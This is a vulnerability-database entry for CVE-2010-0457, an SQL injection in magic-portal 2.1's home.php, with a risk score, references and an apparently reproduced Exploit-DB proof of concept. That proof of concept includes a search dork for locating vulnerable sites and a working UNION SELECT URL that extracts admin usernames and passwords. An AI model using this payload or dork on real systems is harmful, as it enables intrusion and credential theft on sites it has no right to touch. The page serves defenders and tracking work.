CVE-2010-0457
high
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
8.5
Description
SQL injection vulnerability in home.php in magic-portal 2.1 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
magic-portal 2.1 - SQL Injection
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Exploit Title :magic-portal SQL injection Vulnerability
Author: alnjm33
Software Link:
Version: 2.1
Tested on: Version 2.1
My home : Sec-war.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
==========================================Dork==========================================
( Powered by magic-portal Version 2.1 )
================================Exploit=============================================
http://server/home.php?id=-2/**/union/**/select/**/1,concat(username_admin,0x3a,password_admin),3,4/**/from/**/admin_log_cp--
=======================================================================================
Greetz to :PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso - JaMbA - RoOt_EgY- jago-dz - XR57 all Sec-War.com membersApplication impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| a3malnet | magic-portal | 2.1 | |
References
- http://packetstormsecurity.org/1001-exploits/magicportal-sql.txt
- http://www.exploit-db.com/exploits/11235
- https://exchange.xforce.ibmcloud.com/vulnerabilities/55849
- http://packetstormsecurity.org/1001-exploits/magicportal-sql.txt
- http://www.exploit-db.com/exploits/11235
- https://exchange.xforce.ibmcloud.com/vulnerabilities/55849
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.